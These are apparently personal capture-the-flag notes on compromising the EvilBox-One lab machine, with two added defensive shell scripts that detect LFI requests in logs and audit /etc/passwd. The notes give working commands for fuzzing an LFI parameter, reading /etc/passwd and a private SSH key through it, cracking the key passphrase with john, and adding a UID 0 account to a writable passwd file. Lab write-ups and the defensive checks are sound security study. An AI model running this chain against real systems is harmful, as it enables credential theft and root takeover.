Hostname: evilbox-one.
OS Type: Linux
IP Address: 192.168.210.212
Open Ports: 22/80
Usernames: root, mowree (from /etc/passwd, see below)
Spotted Vulns: LFI in /secret/evil.php via the command parameter; /etc/passwd world-writable
Flag Value: See below
Proof Value: See below
Interesting:
http://192.168.210.212/secret/ – Empty file. Interesting
robots.txt is empty except for 'hello hax0r' or whatever
http://192.168.210.212/secret/evil.php also empty
/etc/passwd world-writable.

Site says to try ffuf, fuzzing the parameter name on evil.php with /etc/passwd as the value (-fw 1 filters out responses with a word count of 1, i.e. the empty ones):
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.210.212/secret/evil.php?FUZZ=/etc/passwd -fw 1

Holy shit, this works: the parameter name is command and it dumps /etc/passwd (ffuf output saved in this dir).
http://target/secret/evil.php?command=/etc/passwd

root:x:0:0:root:/root:/bin/bash
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
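As an added defender-side example (not part of the original notes), here is a small POSIX shell scanner that picks evil.php-style requests out of an Apache/nginx combined-format access log: any query parameter whose value starts with a slash or contains a traversal sequence, plain or URL-encoded. The log lines inside sample_log are constructed for the demo, not real traffic from the box, and the combined log format (request target in field 7) is an assumption.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag requests in a web access
# log whose query-string value is an absolute path or a directory traversal,
# which is what the command=/etc/passwd requests look like server-side.
# Assumes Apache/nginx "combined" log format, where field 7 is the request target.

# Constructed sample lines (not real traffic from the box).
sample_log() {
  cat <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /secret/evil.php?command=//home/mowree/.ssh/id_rsa HTTP/1.1" 200 2600 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /secret/evil.php?command=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /secret/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
EOF
}

# lfi_suspects [logfile]   (reads stdin when no file is given)
# Prints "client timestamp param=value" once per request that has a parameter
# value starting with / or %2f, or containing ../ in plain or URL-encoded form.
lfi_suspects() {
  awk '
    {
      target = $7
      q = index(target, "?")
      if (q == 0) next                      # no query string: nothing to inspect
      query = substr(target, q + 1)
      n = split(query, pairs, "&")
      for (i = 1; i <= n; i++) {
        eq = index(pairs[i], "=")
        if (eq == 0) continue
        name = substr(pairs[i], 1, eq - 1)
        val = tolower(substr(pairs[i], eq + 1))   # normalise %2F vs %2f
        if (val ~ "^(/|%2f)" || val ~ "([.][.]|%2e%2e)(/|%2f)") {
          printf "%s %s %s=%s\n", $1, $4, name, val
          break                             # one report per request is enough
        }
      }
    }
  ' ${1:+"$1"}
}

# Convenience wrapper: how many requests were flagged.
lfi_suspect_count() {
  lfi_suspects "$@" | wc -l | tr -d ' '
}

# Stand-alone run: scan the constructed sample (three of the five lines hit).
sample_log | lfi_suspects
```

Run it as `sh lfi_scan.sh /var/log/apache2/access.log` or pipe a log into it. It is after-the-fact detection only; the fix belongs in the application, which should map a short allow-listed name to a file instead of taking a path from the request.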

Now, grab mowree’s id_rsa key:
http://target/secret/evil.php?command=//home/mowree/.ssh/id_rsa
Fk, can't believe that worked.
Saved as id_rsa-mowree.
Now, ssh with it.
ssh -i ~/.ssh/id_rsa mowree@target

The key is passphrase-protected. No worries, let's crack the passphrase with ssh2john (converts the key into a hash john understands) and john:
ssh2john id_rsa-mowree > id_rsa-cracked
john id_rsa-cracked --wordlist=/home/loki/passes/rockyou.txt
unicorn (id_rsa-mowree) BOOM!
Now, ssh -i id_rsa mowree@target with unicorn as the key passphrase.
unicorn worked, but ssh barked at me because permissions on id_rsa were 'too open'. Changed to 700 and it worked.
Local.txt = cb549baa854eae11cb0067989[Clipped] – You can find it!

ssh mowree@target with unicorn as the account password doesn't work.
By default, the cracked passwords are stored in john.pot

ok, wow. /etc/passwd is world-writable. Found it with linpeas.sh (madlinux.com/linpeas.sh)

mowree@EvilBoxOne:~$ openssl passwd fake
ysff4LZ7cRuQU
mowree@EvilBoxOne:~$ echo "root2:ysff4LZ7cRuQU:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su root2
The hash above, made with openssl passwd, is just crypt of 'fake', so john cracks it straight back to the password 'fake'.
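A defender-side check for the world-writable /etc/passwd finding, added here and not part of the original notes: a POSIX shell audit that reports a passwd file writable by group or others and any UID 0 account other than root, which is exactly what the root2 line above creates. The optional path argument is an assumption so it can be run against a copy; the functions default to /etc/passwd.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a passwd file for the two
# things this box turns into root: the file being writable by group/others, and
# more than one UID 0 account. Takes a path argument so it can run against a
# copy; defaults to /etc/passwd.

# Print every account whose UID (field 3) is 0 but is not named root.
extra_uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Return 0 when the file is not writable by group or others.
# Parses the 10-character mode string from ls -ld (position 6 = group w,
# position 9 = other w) rather than stat, whose flags differ between GNU and BSD.
passwd_perms_ok() {
  perm=$(ls -ld "${1:-/etc/passwd}" | cut -c1-10)
  case "$perm" in
    ?????w*|????????w*) return 1 ;;
  esac
  return 0
}

# Run both checks, print a WARN line per finding, return 1 if anything was found.
audit_passwd() {
  f="${1:-/etc/passwd}"
  rc=0
  if ! passwd_perms_ok "$f"; then
    printf 'WARN: %s is writable by group or others (%s); fix with chmod 644\n' \
      "$f" "$(ls -ld "$f" | cut -c1-10)"
    rc=1
  fi
  for name in $(extra_uid0_accounts "$f"); do
    printf 'WARN: extra UID 0 account "%s" in %s\n' "$name" "$f"
    rc=1
  done
  return $rc
}

# Stand-alone run when a path is given, e.g. sh audit_passwd.sh /etc/passwd
# (exit status 1 means findings).
if [ $# -gt 0 ]; then
  audit_passwd "$1"
fi
```

Both conditions are trivial to fix (chmod 644 /etc/passwd, delete the extra UID 0 line) and cheap to check from cron or a config-management run; the second check also catches the case where the file is no longer writable but the backdoor account was already added.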

flag.txt = 24f148f3eadd12bf61691[Clipped] – Find it for yourself
